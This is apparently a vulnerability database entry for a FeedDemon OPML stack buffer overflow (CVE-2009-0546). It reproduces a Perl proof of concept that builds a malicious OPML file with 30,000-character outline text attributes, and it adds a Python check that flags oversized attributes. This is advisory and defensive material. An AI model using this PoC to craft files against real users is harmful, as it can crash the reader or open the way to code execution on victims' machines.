Newsgator FeedDemon outline Tag Stack Overflow Vulnerability

Vulnerability ID: 1117357
Vulnerability type: Buffer overflow
Published: 2009-02-05
Updated: 2009-02-13
CVE ID: CVE-2009-0546
CNNVD-ID: CNNVD-200902-290
Platform: Windows
CVSS score: 9.3
|Vulnerability sources
https://www.exploit-db.com/exploits/7995
https://cxsecurity.com/issue/WLB-2009020177
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-290
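|Vulnerability details
FeedDemon is a popular Windows RSS reader that lets users view and manage RSS feeds on the desktop. FeedDemon does not correctly handle Outline Processor Markup Language (OPML) files. If a user imports an OPML file in which an outline tag carries an overly long text attribute, FeedDemon triggers a stack overflow while parsing the file, resulting in denial of service or arbitrary code execution.
|Vulnerability exploit (EXP)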
#!/usr/bin/perl -w

################################################################################
#     Reference:
#        http://security.bkis.vn/?p=329
#        http://www.securityfocus.com/bid/33630/info
#
#    Tested on Windows Server 2003 with FeedMon 2.7.0.0. FeedMon crashes
#    whenever I am trying to Unsubscribe from the malicious(overlylong) feed.
#
#     Thanx to milw0rm, str0ke, security.bkis, @rp m@n, evilfingers
#    and all security researchers.
#
#$$$$$ This was strictly written for educational purpose. Use it at
#$$$$$ your own risk. Author will not bear any responsibility for any
#$$$$$ damages whatsoever.
#
#####MOST OF THE CODE I GOT FROM###############################################
#####http://search.cpan.org/~madghoul/XML-OPML-0.26/OPML.pm####################
#
#    Author: Praveen Dar$hanam
#    Visit:
#        http://www.darshanams.blogspot.com/
#        http://www.evilfingers.com/
################################################################################

use XML::OPML;
print "OPML is working fine\n\n";

 my $opml = new XML::OPML(version => "1.1");

 $opml->head(
             title => 'FeedDemon \'outline\' Tag Buffer Overflow Vulnerability PoC',
             dateCreated => 'Thur, 05 Feb 2009 8.55:35:00 IST',
             ownerName => 'Praveen Darshanam',
             ownerEmail => 'praveen_recker@sify.com',
             expansionState => '',
             vertScrollState => '',
             windowTop => '',
             windowLeft => '',
             windowBottom => '',
             windowRight => '',
           );

 $buff="D" x 30000;
 # Malicious buffer which creates overly long text tag

 $opml->add_outline(
                 description => 'Warren Ellis\' Personal Weblog',
                 title => 'Warren Ellis Speaks Clever',
                 text => $buff,
                 type => 'rss',
                 version => 'RSS',
                 htmlUrl => 'http://www.diepunyhumans.com ',
                 xmlUrl => 'http://www.diepunyhumans.com/index.rdf ',
               );

 $opml->add_outline(
                 descriptions => 'The raelity bytes weblog.',
                 title => 'raelity bytes',
                 text => $buff,
                 type => 'rss',
                 version => 'RSS',
                 htmlUrl => 'http://www.raelity.org ',
                 xmlUrl => 'http://www.raelity.org/index.rss10 ',
               );

 $opml->save('malicious_files.opml');

# milw0rm.com [2009-02-05]
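
A pre-import check for the condition described above, as an added example that is not part of the original advisory or the PoC author's code: it parses an OPML file and reports any outline attribute longer than a policy limit. The 1024-character limit, the function names and the sample documents are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Assumed policy limit: the advisory does not state the size of the overflowed buffer.
MAX_ATTR_LEN = 1024


def oversized_outline_attrs(opml_text, limit=MAX_ATTR_LEN):
    """Return (outline_index, attribute, length) for every <outline>
    attribute longer than `limit` characters."""
    root = ET.fromstring(opml_text)
    findings = []
    for idx, outline in enumerate(root.iter("outline")):
        for name, value in outline.attrib.items():
            if len(value) > limit:
                findings.append((idx, name, len(value)))
    return findings


def is_safe_to_import(opml_text, limit=MAX_ATTR_LEN):
    """Fail closed: a file that does not parse is treated as unsafe."""
    try:
        return not oversized_outline_attrs(opml_text, limit)
    except ET.ParseError:
        return False


def make_sample(text_value):
    """Build a constructed one-feed OPML document (example.com is a placeholder)."""
    return (
        '<opml version="1.1"><head><title>sample</title></head><body>'
        '<outline type="rss" title="Example feed" text="%s" '
        'xmlUrl="http://example.com/index.rdf"/>'
        "</body></opml>" % text_value
    )


BENIGN = make_sample("Example feed")
OVERSIZED = make_sample("D" * 30000)  # same filler length as the PoC above

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, is_safe_to_import(doc), oversized_outline_attrs(doc))
```

The check covers every attribute of every outline element, including nested ones, so it also catches oversized values outside the text attribute.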
|References

Source: BID
Name: 33630
Link: http://www.securityfocus.com/bid/33630
Source: BUGTRAQ
Name: 20090205 [SVRT-02-09] FeedDemon (ver<=2.7) Buffer Overflow Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/500686/100/0/threaded
Source: MILW0RM
Name: 8010
Link: http://www.milw0rm.com/exploits/8010
Source: MILW0RM
Name: 7995
Link: http://www.milw0rm.com/exploits/7995
Source: MISC
Link: http://security.bkis.vn/?p=329
Source: SECUNIA
Name: 33718
Link: http://secunia.com/advisories/33718
Source: OSVDB
Name: 51753
Link: http://osvdb.org/51753